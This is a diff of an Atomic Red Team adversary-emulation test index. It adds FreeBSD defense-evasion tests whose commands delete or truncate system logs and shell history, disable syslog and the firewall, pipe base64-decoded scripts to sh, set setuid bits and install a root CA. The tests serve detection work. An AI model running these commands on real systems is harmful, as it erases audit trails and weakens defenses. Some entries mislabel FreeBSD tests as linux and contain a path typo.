auto_generated_guid: 14033063-ee04-4eaf-8f5d-ba07ca7a097c
|
||||
description: 'This test truncates the system log files using the truncate utility
|
||||
with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying
|
||||
the file content
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
|
||||
--size=0 /var/log/security #size parameter \n"
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
|
||||
auto_generated_guid: 369878c6-fb04-48d6-8fc2-da9d97b3e054
|
||||
description: 'The first sub-test truncates the log file to zero bytes via /dev/null
|
||||
and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
|
||||
using cat utility
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
cat /dev/null > /var/log/messages #truncating the file to zero bytes
|
||||
cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Overwrite FreeBSD system log via echo utility
|
||||
auto_generated_guid: 11cb8ee1-97fb-4960-8587-69b8388ee9d9
|
||||
description: 'This test overwrites the contents of system log file with an empty
|
||||
string using echo utility
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo '''' > /var/log/messages
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Delete system log files via unlink utility (freebsd)
|
||||
auto_generated_guid: 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
|
||||
description: 'This test deletes the messages log file using unlink utility
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'unlink /var/log/messages
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Delete system journal logs via rm and journalctl utilities
|
||||
auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
|
||||
description: 'The first sub-test deletes the journal files using rm utility
|
||||
@@ -4253,6 +4509,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'rm ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (rm)
|
||||
auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
|
||||
description: 'Clears sh history via rm
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'rm ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (echo)
|
||||
@@ -4265,6 +4533,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'echo "" > ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (echo)
|
||||
auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
|
||||
description: 'Clears sh history via echo
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo "" > ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (cat dev/null)
|
||||
@@ -4278,6 +4558,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'cat /dev/null > ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (cat dev/null)
|
||||
auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
|
||||
description: 'Clears sh history via cat /dev/null
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /dev/null > ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (ln dev/null)
|
||||
@@ -4291,6 +4583,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'ln -sf /dev/null ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (ln dev/null)
|
||||
auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
|
||||
description: 'Clears sh history via a symlink to /dev/null
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'ln -sf /dev/null ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (truncate)
|
||||
@@ -4303,6 +4607,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'truncate -s0 ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (truncate)
|
||||
auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
|
||||
description: 'Clears sh history via truncate
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'truncate -s0 ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear history of a bunch of shells
|
||||
@@ -4320,6 +4636,22 @@ defense-evasion:
|
||||
export HISTFILESIZE=0
|
||||
history -c
|
||||
name: sh
|
||||
- name: Clear history of a bunch of shells (freebsd)
|
||||
auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
|
||||
description: 'Clears the history of a bunch of different shell types by setting
|
||||
the history size to zero
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
unset HISTFILE
|
||||
unset histfile
|
||||
export HISTFILESIZE=0
|
||||
export HISTSIZE=0
|
||||
history -c
|
||||
name: sh
|
||||
- name: Clear and Disable Bash History Logging
|
||||
auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
|
||||
description: 'Clears the history and disable bash history logging of the current
|
||||
@@ -4379,6 +4711,33 @@ defense-evasion:
|
||||
'
|
||||
cleanup_command: 'userdel -f testuser1
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Disable sh History Logging with SSH -T (freebsd)
|
||||
auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
|
||||
description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
|
||||
keeps the ssh client from catching a proper TTY, which is what usually gets
|
||||
logged on lastlog
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Install sshpass and create user account used for excuting
|
||||
|
||||
'
|
||||
prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
|
||||
>/dev/null)\n"
|
||||
get_prereq_command: |
|
||||
pw useradd testuser1 -g wheel -s /bin/sh
|
||||
echo 'pwd101!' | pw mod user testuser1 -h 0
|
||||
(which pkg && pkg install -y sshpass)
|
||||
executor:
|
||||
command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
|
||||
|
||||
'
|
||||
cleanup_command: 'rmuser -y testuser1
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1202:
|
||||
@@ -4562,7 +4921,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -4600,7 +4958,6 @@ defense-evasion:
|
||||
description: "Use Perl to decode a base64-encoded text string and echo it to
|
||||
the console \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -4661,6 +5018,80 @@ defense-evasion:
|
||||
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
|
||||
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
|
||||
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
|
||||
- name: Base64 decoding with shell utilities (freebsd)
|
||||
auto_generated_guid: b6097712-c42e-4174-b8f2-4b1e1a5bbb3d
|
||||
description: 'Use common shell utilities to decode a base64-encoded text string
|
||||
and echo it to the console
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
message:
|
||||
description: Message to print to the screen
|
||||
type: string
|
||||
default: Hello from Atomic Red Team test T1140!
|
||||
encoded_file:
|
||||
description: File to temporarily save encoded text
|
||||
type: path
|
||||
default: "/tmp/T1140.encoded"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
ENCODED=$(echo '#{message}' | b64encode -r -)
|
||||
printf $ENCODED | b64decode -r
|
||||
echo $ENCODED | b64decode -r
|
||||
echo $(echo $ENCODED) | b64decode -r
|
||||
echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}
|
||||
echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}
|
||||
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
|
||||
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
|
||||
- name: FreeBSD b64encode Shebang in CLI
|
||||
auto_generated_guid: 18ee2002-66e8-4518-87c5-c0ec9c8299ac
|
||||
description: "Using b64decode shell scripts that have Shebang in them. This
|
||||
is commonly how attackers obfuscate passing and executing a shell script.
|
||||
Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
|
||||
by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
|
||||
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
|
||||
for it. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
bash_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
|
||||
dash_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
|
||||
fish_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
|
||||
sh_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
|
||||
dependencies:
|
||||
- description: 'b64decode must be present
|
||||
|
||||
'
|
||||
prereq_command: 'which b64decode
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo "please install b64decode"
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
echo #{bash_encoded} | b64decode -r | sh
|
||||
echo #{dash_encoded} | b64decode -r | sh
|
||||
echo #{fish_encoded} | b64decode -r | sh
|
||||
echo #{sh_encoded} | b64decode -r | sh
|
||||
- name: Hex decoding with shell utilities
|
||||
auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973'
|
||||
description: 'Use common shell utilities to decode a hex-encoded text string
|
||||
@@ -4668,7 +5099,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5579,7 +6009,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5611,7 +6040,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5646,7 +6074,6 @@ defense-evasion:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5673,7 +6100,6 @@ defense-evasion:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -6500,6 +6926,34 @@ defense-evasion:
|
||||
cleanup_command: |
|
||||
ufw enable
|
||||
ufw status verbose
|
||||
- name: Stop/Start Packet Filter
|
||||
auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7
|
||||
description: 'Stop the Packet Filter if installed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pfctl is installed on the machine.
|
||||
|
||||
'
|
||||
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
|
||||
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
|
||||
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
|
||||
get_prereq_command: 'echo ""
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
service pf stop
|
||||
service pf disable
|
||||
cleanup_command: |
|
||||
service pf enable
|
||||
service pf start
|
||||
service pf status
|
||||
- name: Stop/Start UFW firewall systemctl
|
||||
auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1
|
||||
description: "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
|
||||
@@ -6581,6 +7035,33 @@ defense-evasion:
|
||||
cleanup_command: |
|
||||
{ echo y; echo response; } | ufw delete 1
|
||||
ufw status numbered
|
||||
- name: Add and delete Packet Filter rules
|
||||
auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b
|
||||
description: "Add and delete a rule on the Packet Filter (PF) if installed and
|
||||
enabled. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pf is installed on the machine and enabled.
|
||||
|
||||
'
|
||||
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
|
||||
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
|
||||
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
|
||||
get_prereq_command: |
|
||||
echo "anchor pf-rules >> /etc/pf.conf"
|
||||
pfctl -f /etc/pf.conf
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
|
||||
pfctl -a pf-rules -s rules
|
||||
cleanup_command: |
|
||||
pfctl -a pf-rules -F rules
|
||||
sed -i "" '/anchor pf-rules/d'
|
||||
pfctl -f /etc/pf.conf
|
||||
- name: Edit UFW firewall user.rules file
|
||||
auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
|
||||
description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
|
||||
@@ -7620,9 +8101,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -7655,9 +8135,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -8582,6 +9061,32 @@ defense-evasion:
|
||||
sudo rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify binary from C source (freebsd)
|
||||
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
|
||||
description: 'Make, change owner, and change file attributes on a C source code
|
||||
file
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1548.001/src/hello.c
|
||||
executor:
|
||||
command: |
|
||||
cp #{payload} /tmp/hello.c
|
||||
chown root /tmp/hello.c
|
||||
make /tmp/hello
|
||||
chown root /tmp/hello
|
||||
chmod u+s /tmp/hello
|
||||
/tmp/hello
|
||||
cleanup_command: |
|
||||
rm /tmp/hello
|
||||
rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file
|
||||
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
@@ -8605,6 +9110,28 @@ defense-evasion:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file (freebsd)
|
||||
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod u+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file
|
||||
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
|
||||
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
||||
@@ -8628,6 +9155,28 @@ defense-evasion:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file (freebsd)
|
||||
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
|
||||
description: 'This test sets the SetGID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod g+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify capabilities of a binary
|
||||
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
|
||||
description: |
|
||||
@@ -8681,7 +9230,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -8695,7 +9243,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -9555,6 +10102,27 @@ defense-evasion:
|
||||
sed -i '$ d' /etc/#{libaudit_config_file_name}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Auditing Configuration Changes on FreeBSD Host
|
||||
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
|
||||
description: 'Emulates modification of auditd configuration files
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
auditd_config_file_name:
|
||||
description: The name of the auditd configuration file to be changed
|
||||
type: string
|
||||
default: audit_event
|
||||
executor:
|
||||
command: 'echo ''#art_test_1562_006_1'' >> /etc/security/#{auditd_config_file_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i "" ''/#art_test_1562_006_1/d'' /etc/security/#{auditd_config_file_name}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Logging Configuration Changes on Linux Host
|
||||
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
|
||||
description: 'Emulates modification of syslog configuration.
|
||||
@@ -9598,6 +10166,29 @@ defense-evasion:
|
||||
fi
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Logging Configuration Changes on FreeBSD Host
|
||||
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
|
||||
description: 'Emulates modification of syslog configuration.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
syslog_config_file_name:
|
||||
description: The name of the syslog configuration file to be changed
|
||||
type: string
|
||||
default: syslog.conf
|
||||
executor:
|
||||
command: |
|
||||
if [ -f "/etc/#{syslog_config_file_name}" ];
|
||||
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
|
||||
fi
|
||||
cleanup_command: |
|
||||
if [ -f "/etc/#{syslog_config_file_name}" ];
|
||||
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
|
||||
fi
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1562.007:
|
||||
technique:
|
||||
modified: '2023-04-15T00:25:36.502Z'
|
||||
@@ -11401,6 +11992,23 @@ defense-evasion:
|
||||
export HISTCONTROL=ignoreboth
|
||||
#{evil_command}
|
||||
name: sh
|
||||
- name: Disable history collection (freebsd)
|
||||
auto_generated_guid: cada55b4-8251-4c60-819e-8ec1b33c9306
|
||||
description: 'Disables history collection in shells
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
evil_command:
|
||||
description: Command to run after shell history collection is disabled
|
||||
type: string
|
||||
default: whoami
|
||||
executor:
|
||||
command: |
|
||||
export HISTSIZE=0
|
||||
#{evil_command}
|
||||
name: sh
|
||||
- name: Mac HISTCONTROL
|
||||
auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
|
||||
description: "The HISTCONTROL variable is set to ignore (not write to the history
|
||||
@@ -11481,6 +12089,25 @@ defense-evasion:
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTSIZE environment variable
|
||||
auto_generated_guid: 386d3850-2ce7-4508-b56b-c0558922c814
|
||||
description: |
|
||||
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
echo $HISTSIZE
|
||||
export HISTSIZE=0
|
||||
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; fi
|
||||
# -> $HISTSIZE is zero
|
||||
cleanup_command: 'export HISTSIZE=100
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
@@ -11501,6 +12128,25 @@ defense-evasion:
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable (freebsd)
|
||||
auto_generated_guid: f7308845-6da8-468e-99f2-4271f2f5bb67
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=~/.sh_history
|
||||
|
||||
'
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
@@ -12614,6 +13260,22 @@ defense-evasion:
|
||||
cleanup_command: "#{cleanup_command}\n"
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable syslog (freebsd)
|
||||
auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf
|
||||
description: 'Disables syslog collection
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
service syslogd stop
|
||||
sysrc syslogd_enable="NO"
|
||||
cleanup_command: |
|
||||
sysrc syslogd_enable="YES"
|
||||
service syslogd start
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable Cb Response
|
||||
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
|
||||
description: 'Disable the Cb Response service
|
||||
@@ -12732,7 +13394,6 @@ defense-evasion:
|
||||
as an additional \npayload to the compromised host and to make sure that there
|
||||
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
|
||||
@@ -13398,6 +14059,37 @@ defense-evasion:
|
||||
/tmp/art.sh
|
||||
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
|
||||
name: sh
|
||||
- name: Decode base64 Data into Script
|
||||
auto_generated_guid: 197ed693-08e6-4958-bfd8-5974e291be6c
|
||||
description: "Creates a base64-encoded data file and decodes it into an executable
|
||||
shell script\n\nUpon successful execution, sh will execute art.sh, which is
|
||||
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
|
||||
uname -v\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
shell_command:
|
||||
description: command to encode
|
||||
type: string
|
||||
default: echo Hello from the Atomic Red Team && uname -v
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'encode the command into base64 file
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh
|
||||
chmod +x /tmp/art.sh
|
||||
/tmp/art.sh
|
||||
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
|
||||
name: sh
|
||||
T1556.006:
|
||||
technique:
|
||||
modified: '2023-02-09T14:18:59.080Z'
|
||||
@@ -14047,7 +14739,6 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, sh is renamed to `crond` and executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
@@ -14679,6 +15370,33 @@ defense-evasion:
|
||||
update-ca-trust
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Install root CA on FreeBSD
|
||||
auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3
|
||||
description: 'Creates a root CA with openssl
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
cert_filename:
|
||||
description: Path of the CA certificate we create
|
||||
type: path
|
||||
default: rootCA.crt
|
||||
key_filename:
|
||||
description: Key we create that is used to create the CA certificate
|
||||
type: path
|
||||
default: rootCA.key
|
||||
executor:
|
||||
command: |
|
||||
openssl genrsa -out #{key_filename} 4096
|
||||
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
|
||||
cp #{cert_filename} /usr/local/share/certs/
|
||||
certctl rehash
|
||||
cleanup_command: |
|
||||
rm /usr/local/share/certs/#{cert_filename}
|
||||
certctl rehash
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Install root CA on Debian/Ubuntu
|
||||
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
|
||||
description: 'Creates a root CA with openssl
|
||||
@@ -14786,7 +15504,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14818,7 +15535,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14849,7 +15565,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -16496,7 +17211,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -16534,7 +17248,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -16590,6 +17303,20 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: bash
|
||||
